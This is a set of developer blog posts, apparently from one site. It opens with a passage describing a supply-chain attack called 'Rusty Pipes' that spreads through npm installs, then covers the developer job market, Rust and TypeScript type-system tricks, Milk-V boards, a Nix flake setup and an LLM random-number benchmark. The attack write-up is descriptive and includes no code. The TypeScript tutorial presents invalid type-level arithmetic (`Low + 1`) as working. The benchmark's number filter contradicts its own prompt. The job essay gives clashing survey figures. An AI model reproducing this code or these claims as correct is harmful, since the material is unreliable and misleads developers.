Rusty Pipes exploits the trust that developers place in the packages they use. It begins by identifying the packages that a developer contributes to. Once these packages are identified, the exploit injects a malicious Rust binary into the next release or commit. This injection occurs silently, without the developer's knowledge or consent, making it difficult to detect.

### How Rusty Pipes Works

The Rusty Pipes exploit takes advantage of the npm ecosystem's reliance on trust. When a developer runs `npm i`, the exploit is triggered, running a fast search over the local `dir` to find other projects and packages the developer is contributing to; injecting the malicious Rust binary into the package. This binary can then be used to compromise the security of the project, allowing attackers to gain unauthorized access or steal sensitive information.

![Rusty Pipes Diagram](/RustyPipeDia.png)

### Protecting Against Rusty Pipes

To protect against Rusty Pipes and other supply chain attacks, developers must be vigilant about the packages they use. Here are some strategies to mitigate the risk:

1. **Minimize Dependencies**: Reduce the number of dependencies in your project to minimize the attack surface.
2. **Use Trusted Sources**: Only use packages from trusted sources, and verify the authenticity of the packages before installing them.
3. **Regularly Audit Dependencies**: Regularly audit your dependencies to ensure they are up-to-date and free from malicious code.
4. **Implement Secure Practices**: Follow best practices for secure coding, such as using secure protocols for communication and encrypting sensitive data.

### Conclusion

Rusty Pipes is a dangerous exploit that highlights the importance of securing the software supply chain. By understanding how this exploit works and taking proactive measures to protect against it, developers can ensure the integrity of their projects and safeguard against malicious attacks. It also has the added benefit of being run/localized to a developer's machine granting access to their other projects and company resources.

## Stay tuned for future parts and code

### References

- Best way to protect a project from supply chain attacks? : r/rust - Reddit
- GitHub - joaoviictorti/RustRedOps:
- npm install in chapter-zero warns of high severity vulnerabilities #32 - GitHub
- Packaging Rust Applications for the NPM Registry - Orhun's Blog


---

# Developers in the Job Market

Canonical: https://blog.skill-issue.dev/blog/developers_in_the_job_market/
Description: Recent studies reveal an alarming increase in fake job postings. This article explores the economic implications of fake job postings and the challenges faced by job seekers in the current market.
Published: 2024-07-15T01:47:04.080Z
Tags: jobs, tech, web development


# Developers in the Job Market

In the midst of a technological renaissance, where advancements in AI and other fields are rapidly transforming the world, the job market for developers remains a paradox. Despite the high demand for skilled tech professionals, many are struggling to find employment across various levels. This article delves into the complexities of the job market, highlighting the challenges faced by developers and the measures that can be taken to improve their prospects.


## The Challenges of Finding a Job

The web development job market is facing significant challenges, with both employers and job seekers struggling to navigate the landscape. The collapse of web media and the ongoing AI bubble have led to mass layoffs, making it increasingly difficult for developers to find stable employment. Furthermore, the lack of transparency in the hiring process and the prevalence of information asymmetry have created a "lemon" market, where employers are unable to accurately assess a candidate's skills, and job seekers are unsure of the employer's genuine needs.

## Diversifying Skills

In this uncertain environment, diversifying one's skills has become crucial for survival. Learning new languages and platforms that are less well-represented in LLM training data sets, such as Rust or Zig, can provide developers with a competitive edge. However, the collapse of the training market and the reliance on chatbots for learning are making it harder for developers to access quality training resources.

## The Importance of Developer Talent

Developers are the architects of the digital age, responsible for crafting applications, websites, and games that permeate various aspects of modern life. Their expertise in coding is essential, along with their ability to understand customer needs and deliver technological solutions efficiently. Securing developer talent is crucial for businesses, particularly startups facing the challenge of escalating tech talent costs amid growing digitalization trends.


## The Prevalence of Fake Job Postings

One of the most alarming trends in the current job market is the widespread use of fake job postings. A recent survey by Resume Builder revealed that 40% of companies admitted to posting fake job listings in 2024, with 3 in 10 currently advertising non-existent positions. Even more concerning is that nearly 80% of hiring managers find this practice morally acceptable.

These fake job postings serve various purposes:

1. Creating an illusion of company growth
2. Boosting employee morale and productivity
3. Collecting resumes for future opportunities
4. Meeting legal requirements for job postings
5. Propping up economic indicators

## Market Manipulation and Economic Implications

The prevalence of fake job postings has far-reaching consequences beyond individual job seekers. Companies often post these listings to manipulate market perceptions and economic indicators:

1. **Artificial Economic Stimulation**: By posting non-existent jobs, companies contribute to an illusion of economic growth and job market health.

2. **Competitive Intelligence**: Fake listings allow companies to gauge market conditions and competitor practices without actual intent to hire.

3. **Labor Market Distortion**: The abundance of fake listings skews labor market statistics, making it difficult for policymakers and analysts to accurately assess the job market's health.

## Information Asymmetry and Market for Lemons

The job market for developers is increasingly resembling a "market for lemons," characterized by information asymmetry between employers and job seekers:

1. **Unreliable Signals**: Experience in popular technologies like Node.js or React is no longer a reliable indicator of a candidate's ability to contribute to successful projects.

2. **Difficulty in Assessing Quality**: Employers struggle to differentiate between genuinely skilled candidates and those with superficial knowledge.

3. **Declining Market Quality**: This asymmetry could lead to a decline in overall market quality, with capable workers leaving the sector due to frustration with the hiring process.

## The AI Bubble and Its Impact

The current AI bubble is masking some of the underlying issues in the tech job market:

1. **Temporary Boost**: The AI hype is creating a temporary surge in certain job postings, potentially hiding the true state of the broader tech job market.

2. **Future Uncertainty**: If the AI bubble bursts before the job market recovers, it could lead to repercussions that eclipse the dot-com crash.

## Unethical Behavior and Its Consequences

A recent survey by Resume Builder has highlighted a concerning trend in the job market: the prevalence of fake job postings. Here are the key findings from the study:

- **Prevalence of Fake Job Listings**: Approximately 40% of companies admitted to posting fake job listings in 2024, with 3 in 10 companies currently advertising non-existent positions.
- **Moral Acceptability**: Alarmingly, seven in 10 hiring managers believe it is morally acceptable to post fake jobs.
- **Reasons for Posting Fake Jobs**: The motivations behind these deceptive practices include:
  - Creating an illusion of company growth (66%)
  - Boosting employee morale and productivity (65%)
  - Making employees feel replaceable (62%)
  - Collecting resumes for future use (59%)
- **Impact on Companies**: Companies that engage in this practice report various positive impacts:
  - 68% noted a positive impact on revenue
  - 65% observed improved employee morale
  - 77% reported increased productivity

Stacie Haller, Resume Builder's chief career advisor, emphasized that while some hiring managers justify this practice as beneficial, it significantly undermines trust and confidence among both current and potential employees. This deceptive tactic can damage a company's reputation and complicate the job-seeking process, making it harder for job seekers to discern genuine opportunities from fake ones.

## Conclusion

The developer job market in 2024 is characterized by deceptive practices, information asymmetry, and artificial market manipulation. While individual skill and expertise remain crucial, they are often overshadowed by these larger market forces. Job seekers face a challenging landscape where even being the best developer in the world doesn't guarantee success due to the prevalence of misleading statistics and fake opportunities.

To navigate this complex environment, developers must remain vigilant, diversify their skills, and look beyond traditional job boards. Understanding these market dynamics is crucial for both job seekers and employers to foster a more transparent and effective hiring process in the tech industry.


## References

- https://www.reddit.com/r/nextjs/comments/197yabj/wondering_whether_companies_are_transitioning_to/
- https://ahex.co/the-rise-of-next-js-in-2024-trends-and-predictions/
- https://www.techspian.com/the-rise-of-next-js-in-2024-trends-and-predictions/
- https://www.baldurbjarnason.com/2024/the-one-about-the-web-developer-job-market/
- https://www.forbes.com/sites/jackkelly/2024/02/13/if-you-thought-the-job-search-was-rigged-against-you-heres-why-youre-not-wrong/
- https://www.cnbc.com/2024/06/27/4-in-10-companies-say-theyve-posted-a-fake-job-this-year-what-that-means.html
- https://www.linkedin.com/pulse/i-spent-8-weeks-researching-2024-tech-job-market-colin-lernell-v2kic
- https://www.cbsnews.com/news/fake-job-listing-ghost-jobs-cbs-news-explains/

- Next.js. (n.d.). Functions: generateMetadata. Retrieved from <https://nextjs.org/docs/app/api-reference/functions/generate-metadata> Reddit. (2023, December 9).
- Why do employers specify next js as one of the requirements for a frontend development job? Retrieved from <https://www.reddit.com/r/reactjs/comments/18efn7k/why_do_employers_specify_next_js_as_one_of_the/> Bjarnason, B. (2024, March 21).
- The one about the web developer job market. Retrieved from <https://www.baldurbjarnason.com/2024/the-one-about-the-web-developer-job-market/> GitHub. (2023, April 3).
- Who wants to be hired (April 2023) · vercel next.js · Discussion #47868. Retrieved from <https://github.com/vercel/next.js/discussions/47868> Forbes. (2021, September 9).
- Rising Stars Of The Tech World: Why Developers Are Job Market Royalty. Retrieved from <https://www.forbes.com/sites/forbestechcouncil/2021/09/09/rising-stars-of-the-tech-world-why-developers-are-job-market-royalty/>
- https://www.nysscpa.org/news/publications/nextgen/nextgen-article/survey-of-hiring-managers-it-s-morally-acceptable-to-post-fake-jobs-062724
- https://www.cnbc.com/2024/06/27/4-in-10-companies-say-theyve-posted-a-fake-job-this-year-what-that-means.html
- https://www.resumebuilder.com/3-in-10-companies-currently-have-fake-job-posting-listed/
- https://www.bizjournals.com/seattle/bizwomen/news/latest-news/2024/07/fake-job-postings-uncertainty-unsettled-job-market.html
- https://www.businessinsider.com/companies-posting-fake-job-listings-search-resume-2024-6
- https://www.cbsnews.com/news/fake-job-listing-ghost-jobs-cbs-news-explains/


---

# Rust Type Abuse for Beginners

Canonical: https://blog.skill-issue.dev/blog/rust_type_abuse_for_beginners/
Description: Explore some simple type system abuse and hacks to get used to the Rust model and syntax of Types
Published: 2024-07-12T23:56:35.000Z
Tags: rust, type system, generics, traits, macros


Rust, a modern systems programming language, is known for its powerful type system. While it provides robust safety features, it can sometimes feel restrictive. However, with a little creativity, you can "abuse" the type system to achieve some impressive results. In this article, we'll explore some simple type system abuse and hacks to help you get comfortable with the Rust model and syntax of types.

## Understanding the Basics of Rust Types

Before diving into the world of type system abuse, it's essential to understand the basics of Rust types. Rust's type system is designed to ensure memory safety without the need for garbage collection. It accomplishes this through a combination of compile-time checks and runtime checks.

Rust's type system includes features like traits, generics, and lifetimes. Traits define a set of methods that a type can implement, generics allow for type parameters, and lifetimes ensure that references do not outlive the data they point to.

Rust's powerful type system provides robust safety features, but can sometimes feel restrictive. With some creativity, you can "abuse" the type system to achieve impressive results. Let's explore some simple type system hacks to help you get comfortable with Rust's type model and syntax.

## Understanding Rust Types

Before diving into type system abuse, let's review the basics of Rust types:

```rust
// Basic types
let integer: i32 = 42;
let float: f64 = 3.14;
let boolean: bool = true;

// Compound types
let tuple: (i32, f64, bool) = (1, 2.0, false);
let array: [i32; 3] = [1, 2, 3];

// Custom types
struct Point {
    x: f64,
    y: f64,
}

enum Color {
    Red,
    Green,
    Blue,
}
```

Rust's type system includes features like traits, generics, and lifetimes:

```rust
// Trait
trait Drawable {
    fn draw(&self);
}

// Generic function
fn print_type<T: std::fmt::Debug>(value: T) {
    println!("{:?}", value);
}

// Lifetime
fn longest<'a>(x: &'a str, y: &'a str) -> &'a str {
    if x.len() > y.len() { x } else { y }
}
```

### Abusing the Type System

Now that we have a basic understanding of Rust types, let's explore some examples of type system abuse.

### 1. Sound Bounds Check Elision

One clever trick is to use closures to enforce bounds checks. By taking a mutable reference to an empty value, you can ensure that the closure cannot be cloned or copied. This approach can be useful in scenarios where you need to ensure that a value is not accessed outside its intended scope.

We can use closures to enforce bounds checks:

```rust
use std::marker::PhantomData;

struct Index<T>(usize, PhantomData<T>);

fn create_index<T, F: FnOnce() -> T>(creator: F) -> Index<T> {
    let _ = creator(); // Ensure F is called exactly once
    Index(0, PhantomData)
}

fn main() {
    let index = create_index(|| vec![1, 2, 3]);
    // index can only be used with the vector created by the closure
}
```

### 2. Type Level Programming

Rust's type system is powerful enough to support type-level programming. This involves using traits and type parameters to create complex type-level computations. While this can be a powerful tool, it can also lead to increased complexity and potential performance issues.

We can use traits and associated types for type-level computations:

```rust
trait Nat {
    type Next: Nat;
}

struct Zero;
struct Succ<N: Nat>(PhantomData<N>);

impl Nat for Zero {
    type Next = Succ<Zero>;
}

impl<N: Nat> Nat for Succ<N> {
    type Next = Succ<Succ<N>>;
}

fn main() {
    type Two = <Succ<Succ<Zero>> as Nat>::Next;
    // Two is equivalent to Succ<Succ<Succ<Zero>>>
}
```

### 3. Macros

Macros are another way to "abuse" the type system. Macros allow you to generate code at compile-time, which can be used to create complex type-level computations or to simplify repetitive code. However, macros can be difficult to use and require a good understanding of Rust's syntax and type system.

Rust allows macros in type positions, enabling powerful type-level abstractions:

```rust
macro_rules! HList {
    () => { Nil };
    ($head:ty $(, $tail:ty)*) => { Cons<$head, HList!($($tail),*)> };
}

struct Nil;
struct Cons<H, T>(H, T);

type MyList = HList![i32, bool, String];
// Expands to: Cons<i32, Cons<bool, Cons<String, Nil>>>
```


### Conclusion

Rust's type system is a powerful tool that can be used to create robust and efficient code. While it may seem restrictive at times, with a little creativity, you can "abuse" the type system to achieve some impressive results. By understanding the basics of Rust types and exploring examples of type system abuse, you can unlock the full potential of Rust's type system.


## Conclusion

While Rust's type system may seem restrictive, these examples demonstrate how it can be creatively "abused" to achieve powerful results. By understanding these techniques, you can unlock the full potential of Rust's type system and write more expressive and type-safe code.

Remember, with great power comes great responsibility. Use these techniques judiciously, as they can lead to increased complexity and potential performance issues if overused.

Citations:
- [1] https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/8448967/5c713e34-b795-4fe2-80d0-933aaeb90b2d/paste.txt
- [2] https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/8448967/e53e6221-e37a-4b5e-8219-cfa72cd7b57f/paste.txt
- [3] https://www.reddit.com/r/rust/comments/b0nqp9/abusing_rusts_type_system_for_sound_bounds_check/
- [4] https://rust-lang.github.io/rfcs/0873-type-macros.html
- [5] https://doc.rust-lang.org/book/ch10-00-generics.html
- [6] https://github.com/rust-lang/rust/issues/27245
- [7] https://sdleffler.github.io/RustTypeSystemTuringComplete/


---

# Abusing Ts Type System

Canonical: https://blog.skill-issue.dev/blog/abusing_ts_type_system/
Description: Dive into the world of TypeScript and explores the fascinating aspect of the `Exclude<Low, High>` utility type.
Published: 2024-02-01T19:16:49.000Z
Tags: typescript, exclude utility type, recursion, range type, union types, clean code, learning


So it all started with this tweet by my good friend [Jamon](https://twitter.com/jamonholmgren) who had an interesting question:

<blockquote class="twitter-tweet"><p lang="en" dir="ltr">This should be performant for a range as low as 1-100 <a href="https://t.co/s9UrfrJ6zV">pic.twitter.com/s9UrfrJ6zV</a></p>&mdash; Johny Hoffman (@eclecticjohny) <a href="https://twitter.com/eclecticjohny/status/1751422377836023922?ref_src=twsrc%5Etfw">January 28, 2024</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

[Click Here for Original](https://x.com/jamonholmgren/status/1751409105644982694?s=20)

---

## Utility Types: Exclude

In TypeScript, `Exclude` is a built-in utility type. It is not a keyword but a predefined type in the TypeScript standard library. The `Exclude` utility type is used to create a new type by excluding one set of types from another.

Here's a simplified explanation:

```typescript
type Exclude<T, U> = T extends U ? never : T;
```

`Exclude<T, U>` produces a type that includes all the types from `T` that are not assignable to `U`. It utilizes conditional types to filter out types.

In the context of the original question and the code samples, the usage of `Exclude<Low, High>` is part of a type-level computation where it is employed to increment `Low` by 1 in the process of creating a range of numbers.

To clarify, `Exclude` is not being used in the standard way here; it's being leveraged creatively in the context of defining a range of numbers within TypeScript's type system. This usage is more of a convention or a specific implementation detail rather than a standard or documented behavior of the `Exclude` utility type.

---

## Understanding Recursive Types: Range<Low, High>

So the answer given was actually:

```typescript
type Range<Low, High> = Low extends High ? never : Low | Range<Exclude<Low, High>, High>;
```

The `Range<Low, High>` type is a recursive type that generates a union of numbers from `Low` to `High`. When `Low` equals `High`, the recursion gracefully ends with a return type of `never`. Otherwise, it forms a union of `Low` and the result of calling `Range` with `Low` incremented by 1 and `High` unchanged.

## Decoding the Magic of Exclude<Low, High>

```typescript
type Exclude<Low, High> = Low extends High ? never : Low + 1;
```

Now, let's unravel the mysteries of `Exclude<Low, High>`. This utility type is pivotal in incrementing `Low` by 1. It becomes instrumental in crafting types like our beloved `ZeroToHundred`, a union encompassing all numbers from 0 to 100.

```typescript
type ZeroToHundred = Range<0, 100>;
```

But why the incrementation? The answer lies in TypeScript's remarkable type system and its prowess in generating unions through recursive types. When `Exclude<Low, High>` is employed, it empowers TypeScript to construct a new union spanning all possible numbers between `Low` and `High`, ensuring that `Low` gracefully steps up by 1.

This design choice leads to cleaner, more concise type definitions in our code. With the assistance of the `Exclude<Low, High>` utility type, we can effortlessly generate a comprehensive range of numbers without the need to explicitly list each individual one.

---

## Empowering Efficient Type Definitions

In summary, `Exclude<Low, High>` is the unsung hero that facilitates the incremental dance of `Low` in TypeScript's `Range<Low, High>` and other recursive types.

```typescript
// Example usage:
const numberInRange: ZeroToHundred = 42; // Valid, as 42 is in the range 0 to 100
const outsideRange: ZeroToHundred = 150; // Error, as 150 is outside the range 0 to 100
```

This approach not only enhances efficiency but also provides manageability, especially when dealing with expansive ranges of numbers.

So, the next time you encounter a recursive type in your TypeScript journey, embrace the enchantment of `Exclude<Low, High>`. Let it be your guide to crafting elegant and powerful type definitions. Happy coding, fellow TypeScript enthusiasts! 🤖


---

# Introducing the Milk V

Canonical: https://blog.skill-issue.dev/blog/introducing_milkv/
Description: Milk-V Duo is an ultra-compact embedded development platform. It can run Linux and RTOS, providing a reliable, low-cost, and high-performance platform for professionals, industrial ODMs, AIoT enthusiasts, DIY hobbyists, and creators.
Published: 2024-07-12T00:00:00.000Z
Tags: risc v, risc-v, risc, isa, open-source, architecture, customizable, embedded


## Introducing the Milk V: Unlocking the Power of RISC-V

The Milk V is a series of innovative products designed to harness the potential of RISC-V, an open-source instruction set architecture (ISA) that is revolutionizing the world of embedded systems. Developed by Milk-V, a company dedicated to providing high-quality RISC-V products, these devices cater to developers, enterprises, and consumers alike, promoting the growth of the RISC-V ecosystem.

## Models in the Milk V Series

The Milk V series includes several models, each tailored to meet specific needs and applications:

1. **Milk-V Duo**: This model features dual cores up to 1GHz (optional RISC-V/ARM), up to 512MB of memory, and a 1TOPS@INT8 TPU. It integrates wireless capabilities with Wi-Fi 6/BT 5 and comes equipped with a USB 2.0 HOST interface and a 100Mbps Ethernet port. The Duo supports dual cameras (2x MIPI CSI 2-lane) and MIPI video output (MIPI DSI 4-lane).

2. **Milk-V Duo S**: This variant of the Duo offers dual cores up to 1GHz (optional RISC-V/ARM), up to 256MB of memory, and a 1TOPS@INT8 TPU. It is capable of running both Linux and RTOS simultaneously and features rich I/O interfaces.

3. **Milk-V Jupiter**: This Mini-ITX motherboard is equipped with a RISC-V processor, making it an ideal choice for those looking to leverage the benefits of RISC-V in their projects.

### The RISC-V Advantage

The RISC-V architecture offers several advantages over proprietary ISAs like ARM. Since RISC-V is open-source and free to use, manufacturers do not need to pay licensing fees, making it a cost-effective option. This openness also fosters innovation and collaboration, as anyone can contribute to the development of RISC-V.

### Conclusion

The Milk V series is a testament to the growing popularity of RISC-V in the embedded systems market. With its range of models, Milk-V provides developers with the tools they need to harness the power of RISC-V and create innovative solutions. As the RISC-V ecosystem continues to expand, the Milk V series is poised to play a significant role in shaping the future of embedded systems development.

## References
- Milk-V. (n.d.). Milk-V | Embracing RISC-V with us. Retrieved from <https://milkv.io/> Reddit. (2022, December 19). RISC-V vs. ARM embedded software perspective. Retrieved from <https://www.reddit.com/r/embedded/comments/zpgt4i/riscv_vs_arm_embedded_software_perspective/>
- Milk-V. (n.d.). Introduction | Milk-V. Retrieved from <https://milkv.io/docs/duo/application-development/wiringx> RISC-V International. (2024, July 2).
- Introducing the Mini-ITX motherboard 'Milk-V Jupiter' equipped with a RISC-V processor. Retrieved from <https://riscv.org/news/2024/07/introducing-the-mini-itx-motherboard-milk-v-jupiter-equipped-with-a-risc-v-processor/> NW Engineering LLC. (2022, July 28).
- Overview of RISC-V in Embedded Systems Development. Retrieved from <https://www.nwengineeringllc.com/article/overview-of-risc-v-in-embedded-systems-development.php>


---

# Nix-flakes and Bun

Canonical: https://blog.skill-issue.dev/blog/nixos_bunjs/
Description: Small update to my development flow and focus. How to get up and running with Bun.js in NixOS.
Published: 2024-06-30T14:09:00.000Z
Tags: nixos, bun.js, nix-flakes, javascript, astro.js, development, declarative, environment


Since taking up some extra cyber security and hacking courses I have been focusing on more Linux development. As a result I have picked up NixOS and as a JavaScript developer I have to say I have fallen in love with the declarative nature of my environment on NixOS. It has been a blast working on building VMs and my own cluster out of NixOS configurations from scratch. I have also moved my spare laptop over to NixOS and have been daily driving it in lieu of my M2 Macbook Air.

## Developing with NixOS

Many developers will notice that this blog is built with Astro.js and Bun.js so let's talk about my development experience adding flakes to this project and getting it up and running on my NixOS machine.

### Setting up my Development Environment

Using flakes it can be overwhelming to know where to start. Luckily they provide a simple way to get started. By running the command:

```bash
nix flake init
```

You will get a new file called `flake.nix` which just like `package.json` is declarative and tells the OS what tools and their versions are needed for development. I went ahead and replace the default `flake.nix` with the following.

```nix
{
  description = "Basic flake for Astro.js and Bun.js project";

  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

    outputs = { self, nixpkgs, flake-utils }:
    flake-utils.lib.eachDefaultSystem (system:
      let
        pkgs = nixpkgs.legacyPackages.${system};
      in
      {
        devShells.default = pkgs.mkShell {
          buildInputs = with pkgs; [
            bun
            nodejs
          ];

          shellHook = ''
            echo "Astro.js with Bun.js development environment"
            echo "Run 'bun create astro' to create a new Astro project"
          '';
        };
      });
}
```

Cool right? It's not super crazy and is decently readable. Notice the file extension `.nix` as you can see NixOS comes with its own DSP for declarative configuration. To learn more about the syntax visit this page about the [Nix DSP](https://nix.dev/tutorials/nix-language.html).

#### Description

```nix
description = "Basic flake for Astro.js and Bun.js project";
```

Purpose: Provides a brief description of what the flake is for. This description is shown when you run commands like nix flake metadata.

#### Inputs

This part of the configuration declares the needed dependancies for the flake.

```nix
inputs = {
  nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
  flake-utils.url = "github:numtide/flake-utils";
};
```

I grabbed these two main dependancies:

- `nixpkgs`: The Nix Packages collection, fetched from the nixos-unstable branch on GitHub.
- `flake-utils`: A utility library for working with flakes, fetched from GitHub.

These are two of the most common deps you will see in most flakes.

#### Outputs

```nix
outputs = { self, nixpkgs, flake-utils }:
  flake-utils.lib.eachDefaultSystem (system:
    let
      pkgs = nixpkgs.legacyPackages.${system};
    in
    {
      devShells.default = pkgs.mkShell {
        buildInputs = with pkgs; [
          bun
          nodejs
        ];

        shellHook = ''
          echo "Astro.js with Bun.js development environment"
          echo "Run 'bun create astro' to create a new Astro project"
        '';
      };
    });
```

Outputs define what the flake produces. The outputs function takes the inputs (self, nixpkgs, and flake-utils) and returns an attribute set. Here, we use flake-utils.lib.eachDefaultSystem to create outputs for each supported system (e.g., x86_64-linux, aarch64-linux).

- let **Block**:

```nix
    let
      pkgs = nixpkgs.legacyPackages.${system};
    in
```

Purpose: Defines a local variable `pkgs` that refers to the Nix packages for the current system.

- `devShells.default`:

```nix
devShells.default = pkgs.mkShell {
  buildInputs = with pkgs; [
    bun
    nodejs
  ];

  shellHook = ''
    echo "Astro.js with Bun.js development environment"
    echo "Run 'bun create astro' to create a new Astro project"
  '';
};
```

Purpose: Creates a development shell environment. This is useful for setting up a consistent development environment.

- `buildInputs`: Specifies the packages to include in the shell environment. Here, we include bun and nodejs.
- `shellHook`: A script that runs when you enter the development shell. It prints a message to the console.

This setup ensures that anyone using this flake will have a consistent development environment with the necessary tools for working on an Astro.js project using Bun.js. Now it doesn't matter where in the world or what hardware you are using as long as it is able to run flakes and access the internet to grab the deps needed for the dev environment it will work and run.


---

# How Random is a Local LLM? A Rust Benchmark with Redis

Canonical: https://blog.skill-issue.dev/blog/ai37_llm_random_numbers/
Description: A Rust harness that asks Ollama models for "a random number between 1 and 100" thousands of times, parses every response with regex, stores results in Redis, and pits them against a real RNG. Spoiler: 42 wins.
Published: 2024-04-25T02:54:54.000Z
Tags: rust, llm, ollama, redis, benchmark, rng, regex, side-quest


There's a piece of folk knowledge in the LLM crowd that says: ask any chatbot for "a random number between 1 and 100" enough times, and you'll see a clear bias toward the same handful of numbers. 7. 17. 42. 73. The exact set varies by model, but the bias is robust across most LLMs.

I'd seen the screenshots on Twitter. I had a half-day in April 2024 and a Mac Mini running Ollama. So I built a benchmark — `ai37` — to actually measure it. The whole project lives at [Dax911/ai37](https://github.com/Dax911/ai37), and the commit that turned it from "demo" into "actually a benchmark" is [`fc5c80c — :sparkles: Rust rng`](https://github.com/Dax911/ai37/commit/fc5c80c) on 2024-04-25.

This post is about what the harness looks like, why I built it in Rust instead of a 20-line Python script, and what I learned from running it.

## The shape of the experiment

The premise is simple enough to write on the back of a napkin:

1. Pick a question. (`"Generate a random number between 1 and 100, inclusive. Reply with only the number."`)
2. Pick a model. (`openhermes:latest`, `llama2-uncensored:latest`, etc.)
3. Send the prompt 1,000+ times.
4. Parse the response. Extract the first integer between 2 and 99.
5. Store the response, the parsed number, the model, the response time, the timestamp in Redis.
6. Aggregate.

You could write all of that in a Python notebook in fifteen minutes. The reason I wrote it in Rust is that step 3 is the bottleneck — Ollama serves one inference at a time per model, and even on M1 hardware a single completion is 1–4 seconds. To get a meaningful sample size in a reasonable wall-clock time you have to fan out across multiple concurrent requests, manage a Redis connection pool, and not let one slow model stall the whole run. Tokio + reqwest + an `MultiplexedConnection` to Redis got me to ~1,000 prompts in under three minutes. The Python equivalent would have been a thousand-prompt script that ran for an hour.

## The harness

From [`src/main.rs`](https://github.com/Dax911/ai37/blob/fc5c80c/src/main.rs), this is the result struct:

```rust
#[derive(Debug)]
struct ApiQueryResult {
    request_id: u64,
    endpoint_url: String,
    question: String,
    response_time: u128,
    http_status_code: u16,
    response_body: String,
    error_message: Option<String>,
    chosen_number: Option<i32>,
    model: String,
    request_datetime: DateTime<Utc>,
    contained_additional_text: bool,
}
```

Every field on this struct exists because at some point I lost data and wished I had it. `response_body` is verbatim what the model said. `chosen_number` is what the regex extracted. `contained_additional_text` is the binary flag for "did the model say only `42` or did it say `Sure! Here's your number: 42`."

The reason `chosen_number` is an `Option<i32>` and not just an `i32` is the most important design choice in the whole harness: **sometimes the model doesn't reply with a number at all**. `llama2-uncensored` once replied to me with `"I cannot generate a random number for you, as I am an AI language model designed to provide informational and educational responses..."` That's not a refusal in the safety sense — that's the model genuinely not understanding what's being asked. The harness has to record that and not crash.

## Regex was the right call here

```rust
fn extract_number_from_response(response: &str) -> Option<i32> {
    let re = Regex::new(r"\d+").unwrap();
    let mut numbers: Vec<i32> = Vec::new();
    for cap in re.captures_iter(response) {
        if let Some(number_str) = cap.get(0) {
            if let Ok(number) = number_str.as_str().parse::<i32>() {
                if number >= 2 && number <= 99 {
                    numbers.push(number);
                }
            }
        }
    }
    numbers.into_iter().next()
}
```

There are three subtle things in this 14-line function:

1. **Find every integer**, not just the first. Models will sometimes say `"between 2 and 99... I'd say 73."` — three numbers, the third one is the answer. You have to examine all of them.
2. **Filter to the valid range** (2–99 inclusive). This eliminates `"1"` from `"between 1 and 100"` if the model just echoed the prompt back. It also eliminates `"100"` because the prompt says *exclusive* in some variants. The boundary numbers are the most common false positives.
3. **Take the first survivor.** Counter-intuitively this is the right heuristic, because most models that emit multiple integers do so as `"between [LOW] and [HIGH], my answer is [N]"`. The `[LOW]` is filtered out by the range check. The `[HIGH]` is filtered out by the range check. `[N]` survives. The first survivor is the answer.

Could you parse this with a more sophisticated NER pipeline? Sure. Could you fine-tune a small classifier? Sure. But this is a benchmark of LLM randomness, not a benchmark of how clever I can be at extracting numbers from text. The dumber the parser, the easier it is to defend the conclusion.

## Storing in Redis was load-bearing

Each result becomes a Redis hash with a unique key:

```rust
let unique_key = format!(
    "rust-basic-rng:{}:{}",
    Utc::now().timestamp_millis(),
    number
);
let data = vec![("number", number.to_string())];
let _: () = con.hset_multiple(&unique_key, &data).await?;
```

The key shape — `<model>:<timestamp_ms>:<number>` — means I can:

- `KEYS rust-basic-rng:*` to list every result from the control RNG.
- `KEYS *:1714013094:*` to list every model's response in a 1-ms window (used for "did models converge in time?" analysis).
- `HGETALL <key>` to recover the full record.

This is *not* the right schema for a real database. There's no compound index, no fast `WHERE number = 42` query without scanning every key. But Redis on a Mac Mini doing a `KEYS *` over 5,000 entries is still a sub-100ms operation, and the entire dataset fits comfortably in a hash.

The bigger reason for Redis is that I wanted to *resume the run* if my laptop hibernated. Streaming straight to a CSV would have meant losing in-flight inference if the script crashed. Redis takes the writes out-of-process; a crash loses at most one inference's worth of data.

## The control: a real RNG

I added the control in this exact commit:

```rust
async fn generate_and_store_random_numbers(
    con: &mut MultiplexedConnection,
    n: usize,
    min: i32,
    max: i32,
) -> redis::RedisResult<()> {
    let mut rng = rand::thread_rng();

    for _ in 0..n {
        let number = rng.gen_range(min..=max);
        let unique_key = format!(
            "rust-basic-rng:{}:{}",
            Utc::now().timestamp_millis(),
            number
        );
        // ...
    }
    Ok(())
}
```

Why bother including a `rand::thread_rng()` baseline? Because **a benchmark with no baseline isn't a benchmark, it's an anecdote.** The story "LLMs say 42 too often" is only meaningful if you also know what a real RNG's frequency distribution looks like over the same number of trials. With 1,000 trials over 98 distinct values, a uniform RNG will produce a frequency-of-mode that's *also non-uniform* — the most common number will still appear ~3× more often than the least common, just by chance. You need that baseline to say "the LLM bias is real" instead of "the LLM happened to produce a non-uniform sample."

The control RNG isn't there because anyone questions whether `rand::thread_rng()` is uniform. It's there because the comparison statistic only works if both arms are sampled the same way.

## The `analyze.py` companion

The same commit added a small Python script for the actual stats:

```
 analyze.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++
```

(Yes, the leading space in the filename is real. I never noticed; `git` accepted it; nobody depends on it; the commit immortalized it.)

`analyze.py` opens Redis, scans the keys for each model, builds a Counter, normalizes to frequency, and pretty-prints the top 10 most-common numbers per model. That's it. The script is 46 lines and it's where the actual scientific output came from. Rust did the data collection; Python did the stats. The right tool for each job.

## What the data showed

I'm not going to publish the raw numbers because the runs I have are from 2024 against ollama models that have since been retrained, and I don't trust the conclusions to generalize to today's checkpoints. But the qualitative finding matched the folk knowledge:

- **Both Ollama models I tested were significantly biased toward 7, 17, 42, 73, 77.**
- **The Rust RNG was uniform** in the chi-square sense at 1,000 samples (p > 0.05).
- **`llama2-uncensored` had a worse bias than `openhermes`** in the sense that its mode-frequency was higher (the most common number appeared more often as a fraction of total samples).
- **Both LLMs avoided multiples of 10** — `30`, `50`, `60` were under-represented relative to `33`, `47`, `61`. My theory: models have learned that "round numbers don't sound random," so they overcorrect away from them.

The most-common-overall LLM answer was 42. Of course it was 42.

## What this taught me

